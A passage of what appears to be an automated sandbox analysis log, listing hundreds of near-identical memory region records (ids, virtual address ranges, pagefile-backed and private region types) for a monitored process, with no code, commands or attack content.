1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13836 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 13837 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 13838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13945 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13946 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 13947 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 13948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13961 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 13962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 14007 start_va = 0x2880000 end_va = 